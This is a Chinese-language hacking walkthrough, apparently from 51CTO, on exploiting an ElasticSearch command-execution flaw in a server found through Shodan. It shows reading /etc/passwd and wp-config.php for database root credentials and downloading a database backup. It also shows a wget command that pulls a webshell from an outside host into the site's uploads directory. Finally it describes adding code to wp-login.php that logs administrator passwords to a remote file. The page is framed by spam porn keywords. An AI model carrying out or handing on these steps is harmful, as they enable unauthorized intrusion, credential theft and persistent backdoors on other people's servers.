成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

通過ElasticSearch漏洞獲取某站webshell權(quán)限

原創(chuàng)
安全 漏洞
ElasticSearch在一些大型企業(yè)內(nèi)部往往部署的比較多,因此在獲取某內(nèi)網(wǎng)權(quán)限后,進(jìn)一步的滲透就非常有意義了。在上一篇《ElasticSearch漏洞實戰(zhàn):通過perl進(jìn)行反彈shell》中分析了通過perl腳本來獲取反彈的shell,反彈的shell具有一定的時效性,本文就非perl方面的滲透進(jìn)行探討。

ElasticSearch在一些大型企業(yè)內(nèi)部往往部署的比較多,因此在獲取某內(nèi)網(wǎng)權(quán)限后,進(jìn)一步的滲透就非常有意義了。在上一篇《ElasticSearch漏洞實戰(zhàn):通過perl進(jìn)行反彈shell》中分析了通過perl腳本來獲取反彈的shell,反彈的shell具有一定的時效性,本文就非perl方面的滲透進(jìn)行探討。

1.通過shodanhq搜索引擎搜索關(guān)鍵字“Elasticsearch”

首先在網(wǎng)站shodanhq.com注冊一個用戶,注冊成功后需要通過郵箱進(jìn)行激活,激活后即可使用。在搜索框中輸入關(guān)鍵字“Elasticsearch”進(jìn)行搜索,如圖1所示,結(jié)果以top countries顯示查詢記錄,在早期搜索結(jié)果中中國排名第一,后面以美國部署的服務(wù)器較多。在結(jié)果列表中隨機(jī)選擇一個IP地址,在本例中選擇的是國外的IP。

搜索關(guān)鍵詞“ElasticSearch”

圖1搜索關(guān)鍵詞“ElasticSearch”

2.通過FireFox便攜版本進(jìn)行漏洞測試

在FireFox便攜版本輸入地址“http://192.121.xxx.xxx:9200/_search?pretty”,然后單擊“Load Url”,如圖2所示,在Post Data中輸入以下代碼:

通過FireFox便攜版本進(jìn)行漏洞測試

該代碼的目的是讀取linux操作系統(tǒng)中的/etc/passwd文件的內(nèi)容,如果存在漏洞則讀取passwd文件內(nèi)容,反之則說明該漏洞不存在。

搜索關(guān)鍵詞“ElasticSearch”

圖2測試漏洞是否存在

3.查詢敏感文件

在Post data中修改exec(\"cat /etc/passwd\")內(nèi)容為exec(\"locate *.php \")、exec(\"locate *.sql \")、exec(\"locate *.conf \")等以獲取敏感文件信息,如圖3所示,表明該服務(wù)器可能使用php,且cms系統(tǒng)可能為wordpress。

尋找系統(tǒng)敏感信息

圖3尋找系統(tǒng)敏感信息

使用代碼以下代碼直接獲取wp-config.php 文件所在路徑“/usr/share/nginx/xxxxxxxxxxxxx/wp-config.php”,如圖4所示:

獲取wp-config.php的路徑

圖4獲取wp-config.php的路徑

4.定位網(wǎng)站和真實路徑

通過執(zhí)行“cat /usr/share/nginx/xxxxxxxxxxxxx/wp-config.php”來讀取該文件內(nèi)容,如圖5所示,獲取mysql數(shù)據(jù)庫root賬號和密碼以及網(wǎng)站域名xxxxxxxxxxxxx.com

等信息。通過查看網(wǎng)站所在根目錄,還發(fā)現(xiàn)有mysql文件備份,通過flashget下載工具將其下載到本地,如圖6所示。

獲取網(wǎng)站域名等信息

圖5獲取網(wǎng)站域名等信息

下載數(shù)據(jù)庫文件

圖6下載數(shù)據(jù)庫文件#p#

5.獲取webshell

通過執(zhí)行命令:wget -O /usr/share/nginx/xxxxxxa2/__MACOSX/oxxxxxxxa/ wp-content/uploads /my.php http://www.antian365.com/data/cache/2.txt 將webshell下載到本地服務(wù)器中/usr/share/nginx/xxxxxx2/__MACOSX/xxxxxxxxxxxxx/ wp-content/uploads目錄,webshell地址http://ocXXXXXx.com/wp-content/uploads/my.php,通過中國菜刀進(jìn)行連接,如圖7所示成功獲取webshell權(quán)限。

獲取webshell權(quán)限

圖7獲取webshell權(quán)限

6.討論

在本例中通過命令執(zhí)行漏洞下載了mysql數(shù)據(jù)庫文件,通過查看該文件知道了wordpress管理員的密碼等信息,如圖8所示,可以對該密碼進(jìn)行破解,通過破解的密碼和用戶進(jìn)行登錄,再通過后臺來提權(quán),也可以輕松獲取webshell后門。

獲取wordpress后臺管理員密碼等信息

圖8獲取wordpress后臺管理員密碼等信息

還可以在wp-login.php文件中加入密碼記錄代碼,在if ( force_ssl_admin() && ! is_ssl() )代碼結(jié)束處加入記錄代碼,如圖9所示,加入后的代碼如下:

定期訪問http://www.antian365.com/wp-content/plugins/d.txt,即可獲取管理員登錄密碼等信息。

記錄wordpress密碼代碼

圖9記錄wordpress密碼代碼

注:本文僅供安全研究使用。

責(zé)任編輯:藍(lán)雨淚 來源: 51CTO.com
相關(guān)推薦

2010-09-26 16:46:05

2011-04-19 09:47:14

2010-02-09 18:32:04

2013-07-11 09:51:15

2015-03-06 15:43:39

2010-09-13 15:40:56

2020-10-12 09:46:34

漏洞

2010-11-02 21:17:17

2013-08-29 15:24:36

2015-03-06 15:31:01

2011-08-24 13:24:52

2025-05-13 08:28:00

漏洞終端安全系統(tǒng)安全

2009-07-19 10:48:53

LinuxWebShell反彈CmdLine She

2010-09-13 17:17:04

2010-02-02 15:32:31

2023-07-17 08:21:52

漏洞版本項目

2021-01-27 17:24:27

密碼root權(quán)限漏洞

2016-11-14 13:50:56

2022-02-16 11:51:16

McAfee漏洞Windows

2009-12-04 19:29:33

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 成人免费av | 91精品国产乱码久久久久久久久 | 亚洲欧美久久 | 欧美成人综合 | 亚洲精品国产成人 | 美女天天操 | 日日久| 欧美片网站免费 | 成人精品视频 | 99视频精品 | 亚洲成人av一区二区 | 视频一区二区在线 | 国产综合精品一区二区三区 | 亚洲天天干 | 精品视频国产 | 欧美精选一区二区 | 国产精品久久久久久久久免费 | 九九热在线观看视频 | 国产98在线 | 免费, | 国产日产欧产精品精品推荐蛮挑 | 伊人色综合久久天天五月婷 | 国产成人综合一区二区三区 | 国产成人在线观看免费 | 国产成人精品综合 | 高清成人免费视频 | 亚洲欧美成人影院 | 久草资源在线 | 久久精品亚洲欧美日韩久久 | 免费播放一级片 | 一区二区三区精品视频 | 台湾佬久久 | 精产嫩模国品一二三区 | 91视频国产区 | 久久精品欧美一区二区三区不卡 | 嫩草视频在线看 | 欧美一区二区三区在线视频 | 青草青草久热精品视频在线观看 | 久久久99国产精品免费 | 亚洲 欧美 日韩在线 | 日韩一区二区三区在线观看 | av黄色在线 |